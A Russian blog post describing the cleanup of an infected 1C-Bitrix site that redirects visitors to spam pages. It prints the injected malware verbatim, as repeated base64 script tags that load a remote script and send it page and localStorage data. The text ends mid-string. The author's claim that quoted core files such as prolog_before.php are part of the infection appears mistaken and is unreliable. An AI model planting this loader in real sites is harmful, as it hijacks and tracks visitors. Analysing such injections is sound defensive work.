ИП Чернов Дмитрий Владимирович
ИНН 910814572181 / ОГРНИП 318911200086332

Сомптомы

На одном из проектов на CMS 1c-Bitrix столкнулся с тем, что автоматически через секунду-две после загрузки сайта идет автоматический редирект на какие-то казино, эротику и т.п.

ТЗ

Сайт был создан в 2019 году и с тех пор не обновлялся. Сайт заражен. Надо вылечить.

Первичные действия

В ноябре 2024 года была продлена лицензия, обновлен движок, решения, обновлено все — все что можно. PHP поднял до 8.3.

Проблема исчезла временно.

Да, появились ошибки, свойственные переходу на версию 8 (старый код был на PHP 5 заточен) — заключались в том что некоторые страницы не воспринимали переменные String.

Но, проблема пока что не решена! Через несколько дней началось то же смамое.

Работы

Было установлено что в папке /bitrix/html_pages/ появляется папка с именем домена. В ней в моем случае лежало порядка 25000 папок вида «1a1a7042.shtml» внутри которых всего один файл с именем index@.html

Что-то создает эту директорию и забивает ее содержимым на подмену как минимум главной страницы.

Поиск по содержимому дал следующий результат — имя директории «/bitrix/modules/translate/html_pages» было добавлено в файл autoload.php в сонстанту IGNORE_BX_NAMES

				
					const IGNORE_BX_NAMES = array(
    ...
	'/bitrix/html_pages',
	...
);
				
			

И второе вхождение имени директории «html_pages» также было найдено в файле /bitrix/modules/main/tools/cron_html_pages.php 

				
					<?php
$_SERVER["DOCUMENT_ROOT"] = realpath(__DIR__."/../../../..");
$DOCUMENT_ROOT = $_SERVER["DOCUMENT_ROOT"];

define("NO_KEEP_STATISTIC", true);
define("NOT_CHECK_PERMISSIONS",true);
define("BX_CRONTAB", true);
define('BX_NO_ACCELERATOR_RESET', true);

require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

@set_time_limit(0);
@ignore_user_abort(true);

$hours = is_array($argv) && count($argv) > 1 && intval($argv[1]) > 0 ? intval($argv[1]) : 24;
$validTime = time() - $hours * 60 * 60;
$bytes = \Bitrix\Main\Composite\Data\FileStorage::deleteRecursive("/", $validTime);
\Bitrix\Main\Composite\Helper::updateQuota(-$bytes);
				
			

Посмотрев его содержимое, мне  показалось что этот файл уже одна из частей заражения. Удалил файл — сайт работает нормально.

Смотрим файл /bitrix/modules/main/include/prolog_before.php

				
					<?php

if (!defined('START_EXEC_PROLOG_BEFORE_1'))
{
	define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
}

$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(__DIR__."/../include.php");

CMain::PrologActions();

if (!defined('START_EXEC_PROLOG_BEFORE_2'))
{
	define("START_EXEC_PROLOG_BEFORE_2", microtime(true));
}

				
			

Судя по коду — это тоже часть заражения.  Удаление этого файла ложит сайт. Разбираемся дальше.

Найдена еще одна инъекция в /bitrix/header.php

После стандартного кода:

				
					<?require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");?>
				
			

Стояла инъекция:

				
					<script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script><script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script><script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script><script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script><script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMn